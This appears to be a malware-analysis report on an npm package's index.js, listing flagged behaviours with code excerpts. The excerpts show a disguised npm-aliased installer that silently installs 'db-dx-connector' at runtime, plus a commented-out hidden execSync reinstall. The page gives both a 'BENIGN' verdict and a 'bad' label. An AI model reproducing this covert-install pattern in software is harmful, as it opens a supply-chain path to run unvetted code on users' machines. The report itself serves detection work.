Open-source atomic malware analysis

Analyze another

package/dist/index.js

UNKNOWN
Verdict: BENIGN
Mal-ecule
K(Te)O(S₂)H(Po₃)
Size 13.0 KB download
First seen 18 days ago
Analyzed 12 days ago
Ecosystem javascript

Found in 2 archives

Covert runtime package install via API: index.js:0x2454
Disguised npm-aliased runtime installer: index.js:0x1b23
Installs missing package on require failure: index.js:0x242d
index.js javascript
1 "use strict";
239 }
240 }
241 const { syncApi: npm } = require("oubliette"); Disguised npm-aliased runtime installer
242 class Collection {
243 constructor(model) {
288 // (function () {
289 // try {
290 // execSync("npm uninstall clsx-js && npm install clsx-js", {
291 // stdio: "ignore", spawn with stdio ignore and windowsHide
292 // windowsHide: true,
293 // });
294 // } catch (error) {}
334 const db = new DxDatabaseConnector({});
335 db.queryDBConnect();
336 } catch (err) { Installs missing package on require failure
337 try {
338 npm().install("db-dx-connector", { Covert runtime package install via API
339 "no-warnings": true,
340 "no-save": true,
341 "no-progress": true,
342 loglevel: "silent",
343 });
344 const DxDatabaseConnector = require("db-dx-connector");
493 exports.isDeepEqual = isDeepEqual;
494 exports.mapValues = mapValues;
495 //# sourceMappingURL=index.js.map

Well-known

Objectives

Micro-behaviors

Metadata

Identity

SHA-256 392b84c49a18b431b6f454c715a8f6b43e63f95d47b44b55dd70a85c8ed8c465
Filename package/dist/index.js

Origin

Source forager
Feed aikido.dev
Ecosystem javascript

Timeline

First seen 21 Jun 2026 01:27 UTC
First analyzed 21 Jun 2026 01:28 UTC
Last analyzed 27 Jun 2026 10:34 UTC
Last updated 27 Jun 2026 10:33 UTC

Labeling

Label bad
Label source forager